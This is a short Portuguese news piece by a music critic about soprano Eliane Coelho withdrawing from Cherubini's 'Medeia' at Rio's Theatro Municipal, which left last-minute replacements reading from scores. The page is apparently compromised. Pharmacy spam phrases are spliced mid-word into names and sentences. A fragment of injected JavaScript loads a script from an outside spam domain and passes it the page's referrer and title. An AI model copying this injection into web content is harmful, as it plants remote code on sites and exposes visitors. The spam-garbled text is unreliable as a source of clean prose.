MovimentoNotícia

Eliane Coelho não canta “Medeia”

Fato deixa todos com graves problemas.

online

O soprano Eliane Coelh Purchase online o deveria ter cantado o papel-título da ópera Medeia, de Cherubini, no Theatro Municipal do Rio de Janeiro, neste último dia 19. No entanto, alegando motivos de saúde, em cima da hora declarou-se impossibilitada de cantar tal papel, deixando todos com um seríssimo problema, difícil de ser resolvido.

Geralmente há pronto nos teatros um substituto para esses casos, o que não ocorria no TMRJ, e a solução encontrada foi chamar às pressas os sopranos Veruschka Mainhard Cheap e Tati Helène, que se encarregaram de colocar na memória trechos que já conheciam de Medeia, o que se tornou quase impossível e deu ao espetáculo ares de incontornável amadorismo. As cantoras de última hora várias vezes tiveram de recorrer à leitura das partituras, o que tornou o espetáculo ainda mais amador.

O fato, mais uma vez, order advairhfa without prescription serve de lição que ensina, ou tenta ensinar, uma coisa importantíssima na vida dos teatros e das orquestras:  deve sempre estar à disposição destes, principalmente nos casos de ópera e balé, um substituto apto a entrar imediatamente em cena em casos como o agora o ocorrido.

}s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Faça seu comentário

Leave a Response

Marcus Góes
Musicólogo, crítico de música e dança e pesquisador. Tem livros publicados também no exterior. Considerado a maior autoridade mundial sobre Carlos Gomes.